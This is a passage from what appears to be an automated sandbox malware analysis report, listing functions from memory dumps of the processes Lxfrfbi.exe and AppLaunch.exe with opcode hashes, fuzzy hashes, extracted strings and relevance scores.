Instruction Fuzzy Hash: CED01770E0020DFFCB00EFA8EA0056DBBB9EB45204B5045A99409DB314EB316E009B80

Uniqueness

Uniqueness Score: -1.00%

Function 014F7038 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction ID: bea758188d7557d81833e1aad117b3afa3106d9f3fe8e2376624725984fef5d3
Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction Fuzzy Hash: 9DD05E72C001389B8B10AFE99C044DFFF79EF05650B418126E914A7101D3751A21CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 08176513 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6987b20fbf1010aa63c92e7d0f335017dba1d88293e73b9b1b71bb8f71302301
Instruction ID: 3bf03763fb395d448f05eaf642c2a6aaff6cddefc26a5993c7ddb4f2d9d6a6cd
Opcode Fuzzy Hash: 6987b20fbf1010aa63c92e7d0f335017dba1d88293e73b9b1b71bb8f71302301
Instruction Fuzzy Hash: 66E0E279902228CFDB11CF20D908BDDBBB5FF09305F6582AAD805A3251C7344A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 081CCC28 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2258368483.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_81b0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faefd7418989f13e631e6e8ae5efc1b16a3600adb353fcf68de93565db40c07f
Instruction ID: 945183530494fb6f1574b72b1f0c828cdb24d160d193d1b469c6c577b4fb18e6
Opcode Fuzzy Hash: faefd7418989f13e631e6e8ae5efc1b16a3600adb353fcf68de93565db40c07f
Instruction Fuzzy Hash: 4BC02B3009B30C82D1442798704E7F53B9C8B07703F08280CF00C000618FB30D44C2F8

Uniqueness

Uniqueness Score: -1.00%

Function 081709B2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d22f12992f5c3be918e2b74956b4841ab86cf0e8bc8501de98e5e8aee23e85ae
Instruction ID: 3cb34185268019fd3935bc2e7ebac3286815192bdcf34ff3b6b9ecf3892cab10
Opcode Fuzzy Hash: d22f12992f5c3be918e2b74956b4841ab86cf0e8bc8501de98e5e8aee23e85ae
Instruction Fuzzy Hash: B7D05EB8904219CFEB159F28D4153EDBBB0EF56301F00809EC449AB340C7380D40DF91

Uniqueness

Uniqueness Score: -1.00%

Function 014F2521 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c24a456df95439e1caf118ce9c8d90cbb67cdb0f99af7fcb3f562fdf6c301f
Instruction ID: a114520e8133f9dab98003b842c55216c586118c79d1650b0e340a7dd88ad128
Opcode Fuzzy Hash: 95c24a456df95439e1caf118ce9c8d90cbb67cdb0f99af7fcb3f562fdf6c301f
Instruction Fuzzy Hash: 85C0129090E3C05FDB97163094262457F30FB53252F5A82D6D1448D4A7A1188805C751

Uniqueness

Uniqueness Score: -1.00%

Function 014F26B0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2263fad2d04861d92a644ea7c49f3651abe537074636f57f1247ee3738349dc2
Instruction ID: 037b9a8386891293e3bbddcf746fdeb59e0ad3cdabe5fda7cb457e5dbc95a2ad
Opcode Fuzzy Hash: 2263fad2d04861d92a644ea7c49f3651abe537074636f57f1247ee3738349dc2
Instruction Fuzzy Hash: 3AB092313942090AEAA0AAB97804B263A8C974061AF8000A6B90DC1A21E596E4602250

Uniqueness

Uniqueness Score: -1.00%

Function 014F26AA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9564b78031fe5bcdf3fa2942b904299aeaabf5f7b4590c11a0e9cc4ecf8ddb71
Instruction ID: 2d0aedeae8d71cb6589f0f1c699925804e9feb4cb13785c2f48c9de8b68e5dde
Opcode Fuzzy Hash: 9564b78031fe5bcdf3fa2942b904299aeaabf5f7b4590c11a0e9cc4ecf8ddb71
Instruction Fuzzy Hash: 83B092726983420AE796C9B02A02952BA99B94205634985FA9C8DC5632F272D0129204

Uniqueness

Uniqueness Score: -1.00%

Function 072CFE71 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aabf567de991197c66ae2b26505c931c1356004783281ad3c588d2ad9be2e4bd
Instruction ID: e9126ae85d75462184354109ed48d005bf9c376f913613b3eea43c3411424e47
Opcode Fuzzy Hash: aabf567de991197c66ae2b26505c931c1356004783281ad3c588d2ad9be2e4bd
Instruction Fuzzy Hash: 26C04C716883455AFB816B21DA0A7543B60E751780F211153D9498E0C29759685CC712

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 8084, Parent PID: 7936COMMON

Executed Functions

Function 06EE0EB8 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06EE0EED
(bq, xrefs: 06EE1192

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID: (bq$Te^q
API String ID: 0-2856382362
Opcode ID: 6c67f0c39c6aaff2eacd48d4c98fbdd5789a44ddacd99e288967d6d7ed6d2bc9
Instruction ID: 8b804832d641231db135ce982ec36a93db0b12d536d6c5e5f356b66870e8df3c
Opcode Fuzzy Hash: 6c67f0c39c6aaff2eacd48d4c98fbdd5789a44ddacd99e288967d6d7ed6d2bc9
Instruction Fuzzy Hash: F9515B30B102149FC794DF69C858A9EBBF6FF89710F2581A9E806DB3A5CA75DD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06EE0D20 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

dLdq, xrefs: 06EE0D5B
Hbq, xrefs: 06EE0E40

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID: Hbq$dLdq
API String ID: 0-411705877
Opcode ID: 8821f8c24185605e2c12e5d125853811ee382b7f2e9848f377a2315e6e2a8d7b
Instruction ID: 43302084715e7e49a67b816960a7bf8f7ca29ea02b3e02d2c1181c2b558bd84a
Opcode Fuzzy Hash: 8821f8c24185605e2c12e5d125853811ee382b7f2e9848f377a2315e6e2a8d7b
Instruction Fuzzy Hash: 5841CF31B042048FCB54DF69D458AAEBBF6EF88300F1584AAE405DB3A2CA75DC05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EE1339 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06EE138B

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 4f8013d2095c9cbcd9be88be7bd00779a80ffffe5d4af51c04b1fc325d1d69c6
Instruction ID: a1b19c2dcd3e3b896a2e09b8568ff2107e9700024a5905d787b7dbad15f6fed9
Opcode Fuzzy Hash: 4f8013d2095c9cbcd9be88be7bd00779a80ffffe5d4af51c04b1fc325d1d69c6
Instruction Fuzzy Hash: FF31D230F002058FCB94AB79C9549AE7BF6FF89314B15456DE456DB395DE30CC428791

Uniqueness

Uniqueness Score: -1.00%

Function 06EE0D10 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

dLdq, xrefs: 06EE0D5B

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID: dLdq
API String ID: 0-3390252261
Opcode ID: af06730f5038e5d91fa41f7b2bcc42e343687bcfa2e27bca5cc1f8c317bd7e0b
Instruction ID: d403d942708670084e8b915d9ec7e2e0f53dacbead9fe35984c7c73a687267e3
Opcode Fuzzy Hash: af06730f5038e5d91fa41f7b2bcc42e343687bcfa2e27bca5cc1f8c317bd7e0b
Instruction Fuzzy Hash: 22316A35A002048FDB149F69C458AAABBF6EF88300F14956AE401AB3A5CB75AD44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06EE0E3F Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

Hbq, xrefs: 06EE0E40

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 7be8d5da2fc05479f532a695546f199b16f16d83703b5ff39cff8e598d0a163e
Instruction ID: bae747b035826859c31eba6ebab8d172d6fae0935dccd4282ab5e5bed32f0482
Opcode Fuzzy Hash: 7be8d5da2fc05479f532a695546f199b16f16d83703b5ff39cff8e598d0a163e
Instruction Fuzzy Hash: 13F028307082408FC3859F3EA82442E7FEBEFCA21032508FAE145CB397CD248C058365

Uniqueness

Uniqueness Score: -1.00%

Function 06EE0AA0 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 270c270546d67a52023b3ce3d0b0a1ab11d8fd46c472283f97c4c9c582db4aa4
Instruction ID: 9a58f7abc77ccc5e2af72e304aa23e037dcb479fbbc58f4bc4d6b8b7b7a303c7
Opcode Fuzzy Hash: 270c270546d67a52023b3ce3d0b0a1ab11d8fd46c472283f97c4c9c582db4aa4
Instruction Fuzzy Hash: B651C732100209DFC715DF24F94496ABB63FF84705352966DD4068F36AEB39D946DF90

Uniqueness

Uniqueness Score: -1.00%

Function 06EE11D0 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f5e770fbccf57d010de7850e35d632df93bbd625d2700bdb8a63cab988a591d
Instruction ID: 31dfe5d230a17f88a088aabfc3aedc4699017140874173e0ff5a2b30df39b893
Opcode Fuzzy Hash: 4f5e770fbccf57d010de7850e35d632df93bbd625d2700bdb8a63cab988a591d
Instruction Fuzzy Hash: 99418270F04309AFCB84DFB9C9446AEBBFAEF88300F218569D459D7345DA309D818BA5

Uniqueness

Uniqueness Score: -1.00%

Function 06EE0998 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7820c7b5b3c14ad67cc5c9348068de08e70c6c339aabe6c70b615a20a7758217
Instruction ID: 9010a00482004e2646dedc7d011182c95611870ef4f1e61cf14795fcab213d13
Opcode Fuzzy Hash: 7820c7b5b3c14ad67cc5c9348068de08e70c6c339aabe6c70b615a20a7758217
Instruction Fuzzy Hash: E9219030B5430ADFEBE4AF75E84863E7AA5EF44708701742D950AC2345EAB4C550CB95

Uniqueness

Uniqueness Score: -1.00%

Function 06DAD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2022739629.0000000006DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6dad000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c922ca9b0470842695b2a03a63c090e84b38001782f66a8e6668bb35ee9467d0
Instruction ID: dd2fa9cdc1de45d7f4b0b9d66c9a70cefbccbda057e4bf30ba8efdfe37058269
Opcode Fuzzy Hash: c922ca9b0470842695b2a03a63c090e84b38001782f66a8e6668bb35ee9467d0
Instruction Fuzzy Hash: A82103B1908300DFDB45DF14D9C0B26BF66FF88318F20C569E9090A656C376D456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 06EE09A8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69e08390522f5e947c7d6b3adeebca3ff2a9360599f01a43bb63ccc86b1875c
Instruction ID: 6081d9e7bd10ed09ee49fc2b39cf29eb26ca60e8a8fc49dfb261e5b4fa576777
Opcode Fuzzy Hash: a69e08390522f5e947c7d6b3adeebca3ff2a9360599f01a43bb63ccc86b1875c
Instruction Fuzzy Hash: 27219F30B5030ACFEFE8AFB5B94867E7AA5AF44609700742D950FC6344EEB4C510CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06DAD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2022739629.0000000006DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6dad000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 544dff59a9c4c385829cc4b9cd22deeadd695ca39835b2a207289d704625c70c
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 3811AF76908340CFDB16CF14D5C4B26BF62FF85324F24C5A9D9090B656C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 06EE1431 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912cce9a9c0f39aae2eba090781b67a65e3bc276cdf90e5b828c9293e96a04bc
Instruction ID: 27ddd338d233e00cca216c4e85c763ebcb59b59a6805dcfe4cb973d4f1774592
Opcode Fuzzy Hash: 912cce9a9c0f39aae2eba090781b67a65e3bc276cdf90e5b828c9293e96a04bc
Instruction Fuzzy Hash: 17117C71A00245CFCB54EFB9D8086AABBF6EF8870971108BDE449CB355EA34C942CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06EE1440 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2025770136.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ee0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5fbae6734ac8170928a732cc6b901844673a024bc5f8e7c612e3ba0ad40c23
Instruction ID: 5b04fe77ad5ddcf2014f5a7fa181c3e2d33647952638930b189cd77c3cc6f693
Opcode Fuzzy Hash: ec5fbae6734ac8170928a732cc6b901844673a024bc5f8e7c612e3ba0ad40c23
Instruction Fuzzy Hash: 12115E71B00209DFCB94DBB9D904A6A7BE6AF8860971104BDE409DB355EA35DD42CB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Lxfrfbi.exePID: 8140, Parent PID: 2580COMMON

Executed Functions

Function 07AF8C80 Relevance: 7.2, Strings: 5, Instructions: 983COMMON

Download Yara Rule

Strings

TJcq, xrefs: 07AF8E22
xbaq, xrefs: 07AF8DAD
Te^q, xrefs: 07AF93A3
4'^q, xrefs: 07AF9753
pbq, xrefs: 07AF983A

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$pbq$xbaq
API String ID: 0-2576840827
Opcode ID: 83274690f8cafee95bc8a05b2f4fa33097123731eb2d95aa99cbb8915dc42915
Instruction ID: 3a4356703b834c386bb2eabfd2f711473dc9a00c5f4f46a55cd2f89f7e48054c
Opcode Fuzzy Hash: 83274690f8cafee95bc8a05b2f4fa33097123731eb2d95aa99cbb8915dc42915
Instruction Fuzzy Hash: D8A2A775A00218CFDB55CF69C984AD9BBB2FF89304F1581E9E509AB365DB31AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 07AF8C2C Relevance: 4.0, Strings: 3, Instructions: 277COMMON

Download Yara Rule

Strings

TJcq, xrefs: 07AF8E22
xbaq, xrefs: 07AF8DAD
Te^q, xrefs: 07AF93A3

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$xbaq
API String ID: 0-3225726259
Opcode ID: cdea39e7961fa97599ab8e12d127b976999e8c10bc6c5c1c7cc34bda4090e4d4
Instruction ID: 50b81cff0f9bff2e51c7519b45b5878e2bf4e14bbd73b515ddc77bbef265ddcf
Opcode Fuzzy Hash: cdea39e7961fa97599ab8e12d127b976999e8c10bc6c5c1c7cc34bda4090e4d4
Instruction Fuzzy Hash: 17C178B5E016198FDB58DF6AC9446DDBBF2BF89300F14C0AAD909AB365DB305A81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07AF9FC1 Relevance: 3.6, Strings: 2, Instructions: 1088COMMON

Download Yara Rule

Strings

$^q, xrefs: 07AFA4D0
2, xrefs: 07AFAB10

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: dcc7c7e8ae0e4a8aca8191346994974ebf59ad741a7549649099f9402613e603
Instruction ID: 225571cfeeed90e6a61807cac56ec60fbb32f593a19f0dab3dde4af2dc9ceb6d
Opcode Fuzzy Hash: dcc7c7e8ae0e4a8aca8191346994974ebf59ad741a7549649099f9402613e603
Instruction Fuzzy Hash: F0C2D2B4E012288FCB65DF69C984BD9BBB6BB89300F1085E9E50DA7355DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A114C8 Relevance: 3.1, Strings: 2, Instructions: 593COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01A1159E
\s^q, xrefs: 01A117B2

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 4462a47468554388eb3c4318afca308734e9d7031312b2728b3caceedbe958f5
Instruction ID: ce215b6c53a6d074a4a3bf03115b055d98e99240c73e98bb2af7387f21502a1a
Opcode Fuzzy Hash: 4462a47468554388eb3c4318afca308734e9d7031312b2728b3caceedbe958f5
Instruction Fuzzy Hash: 90326C34A112299FDB14CF79D884AADB7F2BF88304F15C669E40AEB358D7349941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A114B9 Relevance: 2.9, Strings: 2, Instructions: 422COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01A1159E
\s^q, xrefs: 01A117B2

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 58b1dced3a926bfe35aebd06c05b0672f021a1e0a790d00168ae6cbd65b3685b
Instruction ID: 752a8c093d0b88dde4063c1c45de0d7a38d2cc24d43fabb4fc5814eff45be274
Opcode Fuzzy Hash: 58b1dced3a926bfe35aebd06c05b0672f021a1e0a790d00168ae6cbd65b3685b
Instruction Fuzzy Hash: D9F16F75E052299FDB14CF79D880AADB7F2BFC8304F058669D44AEB358DB309942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A11502 Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01A1159E
\s^q, xrefs: 01A117B2

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 59a7cdcdcb936355bbfcda429ecf44b10db12bef918d8ff2695456ee7143de6c
Instruction ID: 6daa51bf572431aeb865c948308d2ebe4b501d150eef23a33d4c9b716065d99c
Opcode Fuzzy Hash: 59a7cdcdcb936355bbfcda429ecf44b10db12bef918d8ff2695456ee7143de6c
Instruction Fuzzy Hash: 0FE14D35A011299FDB14CF79D880AADB7F2BFC8304F158669D44AEB358DB30A942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A11579 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01A1159E
\s^q, xrefs: 01A117B2

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 50576a233868a9825da0159b2cf65ed6923cf8f63c76e4202b498a48d45fd84a
Instruction ID: 25b046b0526da2c06dd2f0bba412a749bbde1a9e8aadf55c94d3d9203224552b
Opcode Fuzzy Hash: 50576a233868a9825da0159b2cf65ed6923cf8f63c76e4202b498a48d45fd84a
Instruction Fuzzy Hash: 03D15D35A015298FDB14CF79D884AADB7F2BFC8304F16C629D449EB358DB30A942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A11E3A Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01A121DF

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 7140301a284c267022cf42101d39c015c698e295ade684add269d6458d015c82
Instruction ID: 91600a779639be64e04de33ef638f4894758924b643e5a03d3fa76fd5bdaf636
Opcode Fuzzy Hash: 7140301a284c267022cf42101d39c015c698e295ade684add269d6458d015c82
Instruction Fuzzy Hash: 44F15E31A041298FDB14CF69C994BADBBF2BF88300F69C1AAD459AB256D734DD81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A111E8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

\s^q, xrefs: 01A11361

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 03f08066ac5e154a68b435fe509397e1581804a4cb23d008344db9ff1f9d0a90
Instruction ID: 25313ebd022cc15df0c507387423996ed9b98658a95672f26311fb34571927af
Opcode Fuzzy Hash: 03f08066ac5e154a68b435fe509397e1581804a4cb23d008344db9ff1f9d0a90
Instruction Fuzzy Hash: 5781E7B8E4010EDFDF14CFAAD5949AEBBB1BF88310F10A655D416EB254DB31A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07AFB3BC Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ce8a3b302722d8ffc2624ddc900b6e4b53cbee4773ca0dd4b8ad726438276a
Instruction ID: 8dc5a2b976a283f148f8a5ca54255175823108b87f73aaddb6f94b032db55700
Opcode Fuzzy Hash: e9ce8a3b302722d8ffc2624ddc900b6e4b53cbee4773ca0dd4b8ad726438276a
Instruction Fuzzy Hash: 3E32D5B4A14229CFCB65DF28C984A99BBB6FF49300F1081E9E54DA7355DB30AE81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01A1278C Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6612d8ffa079f97d832595ccda656cd12d5a35b99ad81965a642b42f95f497b2
Instruction ID: 95c2d0da8581459f36ed9359c1210e29699d42d92d2966e7085517e2c64f2e29
Opcode Fuzzy Hash: 6612d8ffa079f97d832595ccda656cd12d5a35b99ad81965a642b42f95f497b2
Instruction Fuzzy Hash: E5815E32F101259FD714DB69D884B5EB7F3AFC8714F298165E40ADB369DA34DC018B80

Uniqueness

Uniqueness Score: -1.00%

Function 01A12837 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8bda69545f612934f4bc5999c4c6576cc88dcc0817228ecfa8abc09c2f66eda
Instruction ID: c10e9eef7ae5a9e867b86c8cf650f214e8855e48e617a2232670990b9e225e77
